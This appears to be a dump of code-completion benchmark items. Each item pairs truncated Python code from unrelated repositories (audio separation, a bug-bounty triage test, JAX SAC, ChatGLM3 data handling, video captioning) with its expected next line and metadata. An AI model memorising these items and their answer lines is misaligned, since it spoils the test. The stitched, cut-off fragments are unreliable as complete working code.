kernel_size = 3 * L if lookahead else L
self.in_conv = nn.Sequential(
nn.Conv1d(in_channels=2,
out_channels=model_dim, kernel_size=kernel_size, stride=L,
padding=0, bias=False),
nn.ReLU())
# Label embedding layer
self.label_embedding = nn.Sequential(
nn.Linear(label_len, 512),
nn.LayerNorm(512),
nn.ReLU(),
nn.Linear(512, model_dim),
nn.LayerNorm(model_dim),
nn.ReLU())
# Mask generator
self.mask_gen = MaskNet(
model_dim=model_dim, num_enc_layers=num_enc_layers,
dec_buf_len=dec_buf_len,
dec_chunk_size=dec_chunk_size, num_dec_layers=num_dec_layers,
use_pos_enc=use_pos_enc, conditioning=conditioning)
# Output conv layer
self.out_conv = nn.Sequential(
nn.ConvTranspose1d(
in_channels=model_dim, out_channels=2,
kernel_size=(out_buf_len + 1) * L,
stride=L,
padding=out_buf_len * L, bias=False),
nn.Tanh())
if pretrained_path is not None:
state_dict = torch.load(pretrained_path)['model_state_dict']
# Load all the layers except label_embedding and freeze them
for name, param in self.named_parameters():
if 'label_embedding' not in name:
param.data = state_dict[name]
param.requires_grad = False
def init_buffers(self, batch_size, device):
enc_buf = self.mask_gen.encoder.init_ctx_buf(batch_size, device)
dec_buf = self.mask_gen.decoder.init_ctx_buf(batch_size, device)
out_buf = torch.zeros(batch_size, self.model_dim, self.out_buf_len,
device=device)
return enc_buf, dec_buf, out_buf
def predict(self, x, label, enc_buf, dec_buf, out_buf):
# Generate latent space representation of the input
x = self.in_conv(x)
# Generate label embedding
l = self.label_embedding(label) # [B, label_len] --> [B, channels]
l = l.unsqueeze(1).unsqueeze(-1) # [B, 1, channels, 1]
# Generate mask corresponding to the label
m, enc_buf, dec_buf = self.mask_gen(x, l, enc_buf, dec_buf)
# Apply mask and decode
x = x * m
x = torch.cat((out_buf, x), dim=-1)
out_buf = x[..., -self.out_buf_len:]
x = self.out_conv(x)
return x, enc_buf, dec_buf, out_buf
def forward(self, inputs, init_enc_buf=None, init_dec_buf=None,
init_out_buf=None, pad=True, writer=None, step=None, idx=None):
"""
Extracts the audio corresponding to the `label` in the given
`mixture`. Generates `chunk_size` samples per iteration.
Args:
mixed: [B, n_mics, T]
input audio mixture
label: [B, num_labels]
one hot label
Returns:
out: [B, n_spk, T]
extracted audio with sounds corresponding to the `label`
"""
x, label = inputs['mixture'], inputs['label_vector']
if init_enc_buf is None or init_dec_buf is None or init_out_buf is None:
assert init_enc_buf is None and \
init_dec_buf is None and \
init_out_buf is None, \
"Both buffers have to initialized, or " \
"both of them have to be None."
enc_buf, dec_buf, out_buf = self.init_buffers(
x.shape[0], x.device)
else:
enc_buf, dec_buf, out_buf = \
init_enc_buf, init_dec_buf, init_out_buf
mod = 0
if pad:
pad_size = (self.L, self.L) if self.lookahead else (0, 0)
x, mod = mod_pad(x, chunk_size=self.L, pad=pad_size)
x, enc_buf, dec_buf, out_buf = self.predict(
x, label, enc_buf, dec_buf, out_buf)
# Remove mod padding, if present.
if mod != 0:
x = x[:, :, :-mod]
out = {'x': x}
if init_enc_buf is None:
return out
else:
return out, enc_buf, dec_buf, out_buf
# Define optimizer, loss and metrics
def optimizer(model, data_parallel=False, **kwargs):
params = [p for p in model.parameters() if p.requires_grad]
return optim.Adam(params, **kwargs)
def loss(_output, tgt):
pred = _output['x']
return -0.9 * snr(pred, tgt).mean() - 0.1 * si_snr(pred, tgt).mean()
def metrics(inputs, _output, gt):
""" Function to compute metrics """
mixed = inputs['mixture']
output = _output['x']
metrics = {}
def metric_i(metric, src, pred, tgt):
_vals = []
for s, t, p in zip(src, tgt, pred):
_vals.append(torch.mean((metric(p, t) - metric(s, t))).cpu().item())
return _vals
for m_fn in [snr, si_snr]:
metrics[m_fn.__name__] = metric_i(m_fn,
mixed[:, :gt.shape[1], :],
output,
gt)
return metrics
def test_metrics(inputs, _output, gt):
test_metrics = metrics(inputs, _output, gt)
output = _output['x']
delta_itds, delta_ilds, snrs = [], [], []
for o, g in zip(output, gt): | delta_itds.append(itd_diff(o.cpu(), g.cpu(), sr=44100)) | 2 | 2023-10-30 05:36:07+00:00 | 4k |
openai/bugbounty-gpt | tests/test_comment_handling.py | [
{
"identifier": "BugCrowdSubmission",
"path": "bugbounty_gpt/handlers/submission_handler.py",
"snippet": "class BugCrowdSubmission:\n def __init__(self, submission_id, classification, reasoning):\n \"\"\"\n Initializes a BugCrowdSubmission object.\n\n :param submission_id: ID of ... | from bugbounty_gpt.handlers.submission_handler import BugCrowdSubmission
from bugbounty_gpt.handlers.bugcrowd_api import BugCrowdAPI
from unittest.mock import patch, AsyncMock
import logging
import pytest | 2,664 |
def test_prepare_comment_data():
submission = BugCrowdSubmission("submission_id", None, None)
comment_body = "Test comment"
expected_data = {
"data": {
"type": "comment",
"attributes": {
"body": comment_body,
"visibility_scope": "everyone"
},
"relationships": {
"submission": {
"data": {
"id": "submission_id",
"type": "submission"
}
}
}
}
}
assert submission._prepare_comment_data(comment_body) == expected_data
@pytest.mark.asyncio
async def test_create_comment_success():
submission = BugCrowdSubmission("submission_id", None, None)
comment_body = "Test comment"
|
def test_prepare_comment_data():
submission = BugCrowdSubmission("submission_id", None, None)
comment_body = "Test comment"
expected_data = {
"data": {
"type": "comment",
"attributes": {
"body": comment_body,
"visibility_scope": "everyone"
},
"relationships": {
"submission": {
"data": {
"id": "submission_id",
"type": "submission"
}
}
}
}
}
assert submission._prepare_comment_data(comment_body) == expected_data
@pytest.mark.asyncio
async def test_create_comment_success():
submission = BugCrowdSubmission("submission_id", None, None)
comment_body = "Test comment"
| with patch.object(BugCrowdAPI, 'create_comment', new_callable=AsyncMock) as mock_create_comment: | 1 | 2023-10-27 22:41:24+00:00 | 4k |
LeapLabTHU/FamO2O | jax_cql/JaxCQL/sac.py | [
{
"identifier": "next_rng",
"path": "jax_cql/JaxCQL/jax_utils.py",
"snippet": "def next_rng(*args, **kwargs):\n global jax_utils_rng\n return jax_utils_rng(*args, **kwargs)"
},
{
"identifier": "value_and_multi_grad",
"path": "jax_cql/JaxCQL/jax_utils.py",
"snippet": "def value_and_... | from collections import OrderedDict
from copy import deepcopy
from functools import partial
from ml_collections import ConfigDict
from flax.training.train_state import TrainState
from .jax_utils import (
next_rng, value_and_multi_grad, mse_loss, JaxRNG, wrap_function_with_rng,
collect_jax_metrics
)
from .model import Scalar, update_target_network
import numpy as np
import jax
import jax.numpy as jnp
import flax
import flax.linen as nn
import optax
import distrax | 2,529 | qf2_params = self.qf.init(
next_rng(self.qf.rng_keys()),
jnp.zeros((10, self.observation_dim)),
jnp.zeros((10, self.action_dim))
)
self._train_states['qf2'] = TrainState.create(
params=qf2_params,
tx=optimizer_class(self.config.qf_lr),
apply_fn=None,
)
self._target_qf_params = deepcopy({'qf1': qf1_params, 'qf2': qf2_params})
model_keys = ['policy', 'qf1', 'qf2']
if self.config.use_automatic_entropy_tuning:
self.log_alpha = Scalar(0.0)
self._train_states['log_alpha'] = TrainState.create(
params=self.log_alpha.init(next_rng()),
tx=optimizer_class(self.config.policy_lr),
apply_fn=None
)
model_keys.append('log_alpha')
self._model_keys = tuple(model_keys)
self._total_steps = 0
def train(self, batch):
self._total_steps += 1
self._train_states, self._target_qf_params, metrics = self._train_step(
self._train_states, self._target_qf_params, next_rng(), batch
)
return metrics
@partial(jax.jit, static_argnames='self')
def _train_step(self, train_states, target_qf_params, rng, batch):
rng_generator = JaxRNG(rng)
def loss_fn(train_params, rng):
observations = batch['observations']
actions = batch['actions']
rewards = batch['rewards']
next_observations = batch['next_observations']
dones = batch['dones']
loss_collection = {}
@wrap_function_with_rng(rng_generator())
def forward_policy(rng, *args, **kwargs):
return self.policy.apply(
*args, **kwargs,
rngs=JaxRNG(rng)(self.policy.rng_keys())
)
@wrap_function_with_rng(rng_generator())
def forward_qf(rng, *args, **kwargs):
return self.qf.apply(
*args, **kwargs,
rngs=JaxRNG(rng)(self.qf.rng_keys())
)
new_actions, log_pi = forward_policy(train_params['policy'], observations)
if self.config.use_automatic_entropy_tuning:
alpha_loss = -self.log_alpha.apply(train_params['log_alpha']) * (log_pi + self.config.target_entropy).mean()
loss_collection['log_alpha'] = alpha_loss
alpha = jnp.exp(self.log_alpha.apply(train_params['log_alpha'])) * self.config.alpha_multiplier
else:
alpha_loss = 0.0
alpha = self.config.alpha_multiplier
""" Policy loss """
q_new_actions = jnp.minimum(
forward_qf(train_params['qf1'], observations, new_actions),
forward_qf(train_params['qf2'], observations, new_actions),
)
policy_loss = (alpha*log_pi - q_new_actions).mean()
loss_collection['policy'] = policy_loss
""" Q function loss """
q1_pred = forward_qf(train_params['qf1'], observations, actions)
q2_pred = forward_qf(train_params['qf2'], observations, actions)
new_next_actions, next_log_pi = forward_policy(train_params['policy'], next_observations)
target_q_values = jnp.minimum(
forward_qf(target_qf_params['qf1'], next_observations, new_next_actions),
forward_qf(target_qf_params['qf2'], next_observations, new_next_actions),
)
if self.config.backup_entropy:
target_q_values = target_q_values - alpha * next_log_pi
q_target = jax.lax.stop_gradient(
rewards + (1. - dones) * self.config.discount * target_q_values
)
qf1_loss = mse_loss(q1_pred, q_target)
qf2_loss = mse_loss(q2_pred, q_target)
loss_collection['qf1'] = qf1_loss
loss_collection['qf2'] = qf2_loss
return tuple(loss_collection[key] for key in self.model_keys), locals()
train_params = {key: train_states[key].params for key in self.model_keys}
(_, aux_values), grads = value_and_multi_grad(loss_fn, len(self.model_keys), has_aux=True)(train_params, rng)
new_train_states = {
key: train_states[key].apply_gradients(grads=grads[i][key])
for i, key in enumerate(self.model_keys)
}
new_target_qf_params = {}
new_target_qf_params['qf1'] = update_target_network(
new_train_states['qf1'].params, target_qf_params['qf1'],
self.config.soft_target_update_rate
)
new_target_qf_params['qf2'] = update_target_network(
new_train_states['qf2'].params, target_qf_params['qf2'],
self.config.soft_target_update_rate
)
|
class SAC(object):
@staticmethod
def get_default_config(updates=None):
config = ConfigDict()
config.discount = 0.99
config.alpha_multiplier = 1.0
config.use_automatic_entropy_tuning = True
config.backup_entropy = False
config.target_entropy = 0.0
config.policy_lr = 3e-4
config.qf_lr = 3e-4
config.optimizer_type = 'adam'
config.soft_target_update_rate = 5e-3
if updates is not None:
config.update(ConfigDict(updates).copy_and_resolve_references())
return config
def __init__(self, config, policy, qf):
self.config = self.get_default_config(config)
self.policy = policy
self.qf = qf
self.observation_dim = policy.observation_dim
self.action_dim = policy.action_dim
self._train_states = {}
optimizer_class = {
'adam': optax.adam,
'sgd': optax.sgd,
}[self.config.optimizer_type]
policy_params = self.policy.init(
next_rng(self.policy.rng_keys()),
jnp.zeros((10, self.observation_dim))
)
self._train_states['policy'] = TrainState.create(
params=policy_params,
tx=optimizer_class(self.config.policy_lr),
apply_fn=None
)
qf1_params = self.qf.init(
next_rng(self.qf.rng_keys()),
jnp.zeros((10, self.observation_dim)),
jnp.zeros((10, self.action_dim))
)
self._train_states['qf1'] = TrainState.create(
params=qf1_params,
tx=optimizer_class(self.config.qf_lr),
apply_fn=None,
)
qf2_params = self.qf.init(
next_rng(self.qf.rng_keys()),
jnp.zeros((10, self.observation_dim)),
jnp.zeros((10, self.action_dim))
)
self._train_states['qf2'] = TrainState.create(
params=qf2_params,
tx=optimizer_class(self.config.qf_lr),
apply_fn=None,
)
self._target_qf_params = deepcopy({'qf1': qf1_params, 'qf2': qf2_params})
model_keys = ['policy', 'qf1', 'qf2']
if self.config.use_automatic_entropy_tuning:
self.log_alpha = Scalar(0.0)
self._train_states['log_alpha'] = TrainState.create(
params=self.log_alpha.init(next_rng()),
tx=optimizer_class(self.config.policy_lr),
apply_fn=None
)
model_keys.append('log_alpha')
self._model_keys = tuple(model_keys)
self._total_steps = 0
def train(self, batch):
self._total_steps += 1
self._train_states, self._target_qf_params, metrics = self._train_step(
self._train_states, self._target_qf_params, next_rng(), batch
)
return metrics
@partial(jax.jit, static_argnames='self')
def _train_step(self, train_states, target_qf_params, rng, batch):
rng_generator = JaxRNG(rng)
def loss_fn(train_params, rng):
observations = batch['observations']
actions = batch['actions']
rewards = batch['rewards']
next_observations = batch['next_observations']
dones = batch['dones']
loss_collection = {}
@wrap_function_with_rng(rng_generator())
def forward_policy(rng, *args, **kwargs):
return self.policy.apply(
*args, **kwargs,
rngs=JaxRNG(rng)(self.policy.rng_keys())
)
@wrap_function_with_rng(rng_generator())
def forward_qf(rng, *args, **kwargs):
return self.qf.apply(
*args, **kwargs,
rngs=JaxRNG(rng)(self.qf.rng_keys())
)
new_actions, log_pi = forward_policy(train_params['policy'], observations)
if self.config.use_automatic_entropy_tuning:
alpha_loss = -self.log_alpha.apply(train_params['log_alpha']) * (log_pi + self.config.target_entropy).mean()
loss_collection['log_alpha'] = alpha_loss
alpha = jnp.exp(self.log_alpha.apply(train_params['log_alpha'])) * self.config.alpha_multiplier
else:
alpha_loss = 0.0
alpha = self.config.alpha_multiplier
""" Policy loss """
q_new_actions = jnp.minimum(
forward_qf(train_params['qf1'], observations, new_actions),
forward_qf(train_params['qf2'], observations, new_actions),
)
policy_loss = (alpha*log_pi - q_new_actions).mean()
loss_collection['policy'] = policy_loss
""" Q function loss """
q1_pred = forward_qf(train_params['qf1'], observations, actions)
q2_pred = forward_qf(train_params['qf2'], observations, actions)
new_next_actions, next_log_pi = forward_policy(train_params['policy'], next_observations)
target_q_values = jnp.minimum(
forward_qf(target_qf_params['qf1'], next_observations, new_next_actions),
forward_qf(target_qf_params['qf2'], next_observations, new_next_actions),
)
if self.config.backup_entropy:
target_q_values = target_q_values - alpha * next_log_pi
q_target = jax.lax.stop_gradient(
rewards + (1. - dones) * self.config.discount * target_q_values
)
qf1_loss = mse_loss(q1_pred, q_target)
qf2_loss = mse_loss(q2_pred, q_target)
loss_collection['qf1'] = qf1_loss
loss_collection['qf2'] = qf2_loss
return tuple(loss_collection[key] for key in self.model_keys), locals()
train_params = {key: train_states[key].params for key in self.model_keys}
(_, aux_values), grads = value_and_multi_grad(loss_fn, len(self.model_keys), has_aux=True)(train_params, rng)
new_train_states = {
key: train_states[key].apply_gradients(grads=grads[i][key])
for i, key in enumerate(self.model_keys)
}
new_target_qf_params = {}
new_target_qf_params['qf1'] = update_target_network(
new_train_states['qf1'].params, target_qf_params['qf1'],
self.config.soft_target_update_rate
)
new_target_qf_params['qf2'] = update_target_network(
new_train_states['qf2'].params, target_qf_params['qf2'],
self.config.soft_target_update_rate
)
| metrics = collect_jax_metrics( | 5 | 2023-10-25 11:53:25+00:00 | 4k |
ssbuild/chatglm3_finetuning | data_utils.py | [
{
"identifier": "DataStrategy",
"path": "data_processer.py",
"snippet": "class DataStrategy(Enum):\r\n truncation = 1\r\n siding = 2\r"
},
{
"identifier": "TokenIdsMaker",
"path": "data_processer.py",
"snippet": "class TokenIdsMaker:\r\n def __init__(self,tokenizer: ChatGLMToken... | import copy
import glob
import json
import os
import typing
import numpy as np
import torch
from functools import cache
from deep_training.data_helper import DataHelper, ModelArguments, TrainingArguments, DataArguments, TrainingArgumentsHF, \
TrainingArgumentsCL, TrainingArgumentsAC
from fastdatasets.record import load_dataset as Loader, RECORD, WriterObject, gfile
from tqdm import tqdm
from transformers import HfArgumentParser
from data_processer import DataStrategy, TokenIdsMaker
from aigc_zoo.model_zoo.chatglm3.llm_model import ChatGLMTokenizer,PetlArguments,ChatGLMConfig
from config import *
| 2,312 | # @Time : 2023/1/22 16:22
# @Author : tk
# @FileName: data_utils.py
assert train_info_args['max_seq_length'] > 20
data_conf = {
'strategy': DataStrategy.truncation, # 数据策略选项
DataStrategy.truncation: {
'sup': True, # 是否监督训练
},
DataStrategy.siding: {
'sliding_size': train_info_args['max_seq_length'] // 3 * 2, #prompt滑动窗口大小
'sup': True, # 是否监督训练
"src_max_length": train_info_args['max_seq_length'] - 10,
"dst_max_length": None,
},
}
def preprocess(text):
#text = text.replace("\n", "\\n").replace("\t", "\\t")
return text
def postprocess(text):
# return text.replace("\\n", "\n").replace("\\t", "\t")
return text
def build_masks_and_position_ids_glm(batch_input_ids, ctxlens):
max_len = batch_input_ids.size(1)
batch_position_ids, batch_attention_mask = [], []
for input_ids,ctxlen in zip(batch_input_ids,ctxlens):
position_ids = list(range(0,max_len))
assert ctxlen <= max_len
attention_mask = [1] * ctxlen + [0] * (max_len - ctxlen)
batch_position_ids.append(torch.tensor(position_ids,dtype=torch.long))
batch_attention_mask.append(torch.tensor(attention_mask,dtype=torch.long))
batch_attention_mask = torch.stack(batch_attention_mask, dim=0)
batch_position_ids = torch.stack(batch_position_ids, dim=0)
return batch_attention_mask,batch_position_ids
class NN_DataHelper(DataHelper):
index = 1
tokens_ids_maker = None
def on_data_ready(self):
self.index = -1
# 切分词
def on_data_process(self, data: typing.Any, mode: str):
self.index += 1
tokenizer: ChatGLMTokenizer = self.tokenizer # noqa
config: ChatGLMConfig = self.config # noqa
max_seq_length = self.max_seq_length_dict[mode]
if self.tokens_ids_maker is None:
| # @Time : 2023/1/22 16:22
# @Author : tk
# @FileName: data_utils.py
assert train_info_args['max_seq_length'] > 20
data_conf = {
'strategy': DataStrategy.truncation, # 数据策略选项
DataStrategy.truncation: {
'sup': True, # 是否监督训练
},
DataStrategy.siding: {
'sliding_size': train_info_args['max_seq_length'] // 3 * 2, #prompt滑动窗口大小
'sup': True, # 是否监督训练
"src_max_length": train_info_args['max_seq_length'] - 10,
"dst_max_length": None,
},
}
def preprocess(text):
#text = text.replace("\n", "\\n").replace("\t", "\\t")
return text
def postprocess(text):
# return text.replace("\\n", "\n").replace("\\t", "\t")
return text
def build_masks_and_position_ids_glm(batch_input_ids, ctxlens):
max_len = batch_input_ids.size(1)
batch_position_ids, batch_attention_mask = [], []
for input_ids,ctxlen in zip(batch_input_ids,ctxlens):
position_ids = list(range(0,max_len))
assert ctxlen <= max_len
attention_mask = [1] * ctxlen + [0] * (max_len - ctxlen)
batch_position_ids.append(torch.tensor(position_ids,dtype=torch.long))
batch_attention_mask.append(torch.tensor(attention_mask,dtype=torch.long))
batch_attention_mask = torch.stack(batch_attention_mask, dim=0)
batch_position_ids = torch.stack(batch_position_ids, dim=0)
return batch_attention_mask,batch_position_ids
class NN_DataHelper(DataHelper):
index = 1
tokens_ids_maker = None
def on_data_ready(self):
self.index = -1
# 切分词
def on_data_process(self, data: typing.Any, mode: str):
self.index += 1
tokenizer: ChatGLMTokenizer = self.tokenizer # noqa
config: ChatGLMConfig = self.config # noqa
max_seq_length = self.max_seq_length_dict[mode]
if self.tokens_ids_maker is None:
| self.tokens_ids_maker = TokenIdsMaker(tokenizer=tokenizer,config=config)
| 1 | 2023-10-27 09:15:00+00:00 | 4k |
DAMO-NLP-SG/CLEX | serve/cli.py | [
{
"identifier": "ChatIO",
"path": "serve/inference.py",
"snippet": "class ChatIO(abc.ABC):\n @abc.abstractmethod\n def prompt_for_input(self, role: str) -> str:\n \"\"\"Prompt for input from a role.\"\"\"\n\n @abc.abstractmethod\n def prompt_for_output(self, role: str):\n \"\"\... | import argparse
import os
import re
import sys
import torch
from prompt_toolkit import PromptSession
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.completion import WordCompleter
from prompt_toolkit.history import InMemoryHistory
from prompt_toolkit.key_binding import KeyBindings
from rich.console import Console
from rich.live import Live
from rich.markdown import Markdown
from fastchat.model.model_adapter import add_model_args
from fastchat.modules.awq import AWQConfig
from fastchat.modules.exllama import ExllamaConfig
from fastchat.modules.gptq import GptqConfig
from serve.inference import ChatIO, chat_loop
from fastchat.utils import str_to_torch_dtype | 2,173 | """
Chat with a model with command line interface.
Usage:
python3 -m fastchat.serve.cli --model lmsys/vicuna-7b-v1.3
python3 -m fastchat.serve.cli --model lmsys/fastchat-t5-3b-v1.0
Other commands:
- Type "!!exit" or an empty line to exit.
- Type "!!reset" to start a new conversation.
- Type "!!remove" to remove the last prompt.
- Type "!!regen" to regenerate the last message.
- Type "!!save <filename>" to save the conversation history to a json file.
- Type "!!load <filename>" to load a conversation history from a json file.
"""
| """
Chat with a model with command line interface.
Usage:
python3 -m fastchat.serve.cli --model lmsys/vicuna-7b-v1.3
python3 -m fastchat.serve.cli --model lmsys/fastchat-t5-3b-v1.0
Other commands:
- Type "!!exit" or an empty line to exit.
- Type "!!reset" to start a new conversation.
- Type "!!remove" to remove the last prompt.
- Type "!!regen" to regenerate the last message.
- Type "!!save <filename>" to save the conversation history to a json file.
- Type "!!load <filename>" to load a conversation history from a json file.
"""
| class SimpleChatIO(ChatIO): | 0 | 2023-10-25 05:30:25+00:00 | 4k |
RenShuhuai-Andy/TESTA | data/video_dataset.py | [
{
"identifier": "pre_caption",
"path": "data/utils.py",
"snippet": "def pre_caption(caption, max_words=50):\n caption = re.sub(\n r\"([!\\\"()*#~])\", #r\"([!\\\"()*#:;~])\" #r\"([.!\\\"()*#:;~])\",\n ' ',\n caption.lower(),\n )\n caption = re.sub(\n r\"\\s{2,}\",\n... | import logging
import copy
import math
import pickle
import torch
import numpy as np
import random
import decord
import json
import os
import random
import pandas as pd
import collections
from torch.utils.data import Dataset
from torchvision.datasets.utils import download_url
from PIL import Image
from decord import VideoReader
from data.utils import pre_caption, pre_question
from .randaugment import TemporalConsistentRandomAugment | 2,348 |
def load_video_from_path_decord(video_path, frm_sampling_strategy, num_frm, height=None, width=None, start_time=None,
end_time=None, fps=-1):
try:
if not height or not width:
vr = VideoReader(video_path)
else:
vr = VideoReader(video_path, width=width, height=height)
vlen = len(vr)
if start_time or end_time:
assert fps > 0, 'must provide video fps if specifying start and end time.'
start_idx = min(int(start_time * fps), vlen)
end_idx = min(int(end_time * fps), vlen)
else:
start_idx, end_idx = 0, vlen
if frm_sampling_strategy == 'uniform':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm, dtype=int)
elif frm_sampling_strategy == 'nlvl_uniform':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm).astype(int)
elif frm_sampling_strategy == 'nlvl_rand':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm).astype(int)
# generate some random perturbations
strides = [frame_indices[i] - frame_indices[i - 1] for i in range(1, len(frame_indices))] + [vlen - frame_indices[-1]]
pertube = np.array([np.random.randint(0, stride) for stride in strides])
frame_indices = frame_indices + pertube
elif frm_sampling_strategy == 'rand':
frame_indices = sorted(random.sample(range(vlen), num_frm))
elif frm_sampling_strategy == 'headtail':
frame_indices_head = sorted(random.sample(range(vlen // 2), num_frm // 2))
frame_indices_tail = sorted(random.sample(range(vlen // 2, vlen), num_frm // 2))
frame_indices = frame_indices_head + frame_indices_tail
else:
raise NotImplementedError('Invalid sampling strategy {} '.format(frm_sampling_strategy))
raw_sample_frms = vr.get_batch(frame_indices)
except Exception as e:
return None
raw_sample_frms = raw_sample_frms.permute(0, 3, 1, 2) # (N, H, W, C) to (N, C, H, W)
return raw_sample_frms
class VideoDataset(Dataset):
def __init__(self, video_root, ann_root, num_frm=4, frm_sampling_strategy="rand", max_img_size=384,
video_fmt='.mp4'):
'''
image_root (string): Root directory of video
ann_root (string): directory to store the annotation file
'''
url = 'https://storage.googleapis.com/sfr-vision-language-research/datasets/msrvtt_test.jsonl'
filename = 'msrvtt_test.jsonl'
download_url(url, ann_root)
self.annotation = load_jsonl(os.path.join(ann_root, filename))
print('number of instances: %s' % len(self.annotation))
self.num_frm = num_frm
self.frm_sampling_strategy = frm_sampling_strategy
self.max_img_size = max_img_size
self.video_root = video_root
self.video_fmt = video_fmt
self.img_norm = ImageNorm(mean=(0.48145466, 0.4578275, 0.40821073), std=(0.26862954, 0.26130258, 0.27577711))
# self.text = [pre_caption(ann['caption'], 40) for ann in self.annotation]
self.txt2video = [i for i in range(len(self.annotation))]
self.video2txt = self.txt2video
def __len__(self):
return len(self.annotation)
def __getitem__(self, index):
ann = self.annotation[index]
video_path = os.path.join(self.video_root, ann['clip_name'] + self.video_fmt)
if not os.path.exists(video_path):
print('not exist %s' % video_path)
return
vid_frm_array = load_video_from_path_decord(video_path, self.frm_sampling_strategy, self.num_frm, height=self.max_img_size, width=self.max_img_size)
video = self.img_norm(vid_frm_array.float())
return video, ann['clip_name']
class caption_video(Dataset):
def __init__(self, video_root, ann_root, num_frm=4, frm_sampling_strategy="rand", max_img_size=224,
split='test', max_words=30, prompt='', video_resize=256, input_segments=False, input_asr=False,
asr_drop=0.0, seg_drop=0.0):
'''
image_root (string): Root directory of video
ann_root (string): directory to store the annotation file
'''
filename = '%s.caption_coco_format.json' % split
with open(os.path.join(ann_root, filename), 'r') as f:
self.annotation = json.load(f)['annotations']
if split == 'train':
print('number of instances: %s in %s dataset' % (len(self.annotation), split))
self.num_frm = num_frm
self.frm_sampling_strategy = frm_sampling_strategy
self.max_img_size = max_img_size
self.video_resize = video_resize
self.video_random_cropper = VideoRandomSquareCrop(max_img_size)
|
decord.bridge.set_bridge("torch")
class VideoRandomSquareCrop(object):
def __init__(self, crop_size, p=0.5):
assert isinstance(crop_size, int)
self.crop_size = crop_size
self.p = p
def __call__(self, video):
"""
Args:
img (torch.tensor): video to be cropped.
Returns:
torch.tensor: cropped video.
"""
if isinstance(video, torch.Tensor):
if len(video.shape) == 4:
b, t, h, w = video.shape
else:
raise RuntimeError('Expecting 4-dimensional tensor of shape (b,t,h,w), got {}'.format(video.shape))
# if random.uniform(0, 1) < self.p:
# video = torch.flip(video, (3,))
x = random.randint(0, h - self.crop_size)
y = random.randint(0, w - self.crop_size)
return video[:, :, x: x + self.crop_size, y: y + self.crop_size]
else:
raise NotImplementedError('Support only torch.Tensor as input, got {}'.format(type(video)))
class ImageNorm(object):
"""Apply Normalization to Image Pixels on GPU
"""
def __init__(self, mean, std):
self.mean = torch.tensor(mean).view(1, 3, 1, 1)
self.std = torch.tensor(std).view(1, 3, 1, 1)
def __call__(self, img):
if torch.max(img) > 1 and self.mean.max() <= 1:
img.div_(255.)
return img.sub_(self.mean).div_(self.std)
def load_jsonl(filename):
with open(filename, "r") as f:
return [json.loads(l.strip("\n")) for l in f.readlines()]
def load_video_from_path_decord(video_path, frm_sampling_strategy, num_frm, height=None, width=None, start_time=None,
end_time=None, fps=-1):
try:
if not height or not width:
vr = VideoReader(video_path)
else:
vr = VideoReader(video_path, width=width, height=height)
vlen = len(vr)
if start_time or end_time:
assert fps > 0, 'must provide video fps if specifying start and end time.'
start_idx = min(int(start_time * fps), vlen)
end_idx = min(int(end_time * fps), vlen)
else:
start_idx, end_idx = 0, vlen
if frm_sampling_strategy == 'uniform':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm, dtype=int)
elif frm_sampling_strategy == 'nlvl_uniform':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm).astype(int)
elif frm_sampling_strategy == 'nlvl_rand':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm).astype(int)
# generate some random perturbations
strides = [frame_indices[i] - frame_indices[i - 1] for i in range(1, len(frame_indices))] + [vlen - frame_indices[-1]]
pertube = np.array([np.random.randint(0, stride) for stride in strides])
frame_indices = frame_indices + pertube
elif frm_sampling_strategy == 'rand':
frame_indices = sorted(random.sample(range(vlen), num_frm))
elif frm_sampling_strategy == 'headtail':
frame_indices_head = sorted(random.sample(range(vlen // 2), num_frm // 2))
frame_indices_tail = sorted(random.sample(range(vlen // 2, vlen), num_frm // 2))
frame_indices = frame_indices_head + frame_indices_tail
else:
raise NotImplementedError('Invalid sampling strategy {} '.format(frm_sampling_strategy))
raw_sample_frms = vr.get_batch(frame_indices)
except Exception as e:
return None
raw_sample_frms = raw_sample_frms.permute(0, 3, 1, 2) # (N, H, W, C) to (N, C, H, W)
return raw_sample_frms
class VideoDataset(Dataset):
def __init__(self, video_root, ann_root, num_frm=4, frm_sampling_strategy="rand", max_img_size=384,
video_fmt='.mp4'):
'''
image_root (string): Root directory of video
ann_root (string): directory to store the annotation file
'''
url = 'https://storage.googleapis.com/sfr-vision-language-research/datasets/msrvtt_test.jsonl'
filename = 'msrvtt_test.jsonl'
download_url(url, ann_root)
self.annotation = load_jsonl(os.path.join(ann_root, filename))
print('number of instances: %s' % len(self.annotation))
self.num_frm = num_frm
self.frm_sampling_strategy = frm_sampling_strategy
self.max_img_size = max_img_size
self.video_root = video_root
self.video_fmt = video_fmt
self.img_norm = ImageNorm(mean=(0.48145466, 0.4578275, 0.40821073), std=(0.26862954, 0.26130258, 0.27577711))
# self.text = [pre_caption(ann['caption'], 40) for ann in self.annotation]
self.txt2video = [i for i in range(len(self.annotation))]
self.video2txt = self.txt2video
def __len__(self):
return len(self.annotation)
def __getitem__(self, index):
ann = self.annotation[index]
video_path = os.path.join(self.video_root, ann['clip_name'] + self.video_fmt)
if not os.path.exists(video_path):
print('not exist %s' % video_path)
return
vid_frm_array = load_video_from_path_decord(video_path, self.frm_sampling_strategy, self.num_frm, height=self.max_img_size, width=self.max_img_size)
video = self.img_norm(vid_frm_array.float())
return video, ann['clip_name']
class caption_video(Dataset):
def __init__(self, video_root, ann_root, num_frm=4, frm_sampling_strategy="rand", max_img_size=224,
split='test', max_words=30, prompt='', video_resize=256, input_segments=False, input_asr=False,
asr_drop=0.0, seg_drop=0.0):
'''
image_root (string): Root directory of video
ann_root (string): directory to store the annotation file
'''
filename = '%s.caption_coco_format.json' % split
with open(os.path.join(ann_root, filename), 'r') as f:
self.annotation = json.load(f)['annotations']
if split == 'train':
print('number of instances: %s in %s dataset' % (len(self.annotation), split))
self.num_frm = num_frm
self.frm_sampling_strategy = frm_sampling_strategy
self.max_img_size = max_img_size
self.video_resize = video_resize
self.video_random_cropper = VideoRandomSquareCrop(max_img_size) | self.video_rand_aug = TemporalConsistentRandomAugment(N=2, M=5, augs=['Identity', 'Contrast','Brightness','Sharpness', 'ShearX', 'ShearY', 'TranslateX', 'TranslateY', 'Rotate', 'HorizontalFlip']) | 2 | 2023-10-29 12:09:38+00:00 | 4k |
flbraun/poe-palette | data/wiki.py | [
{
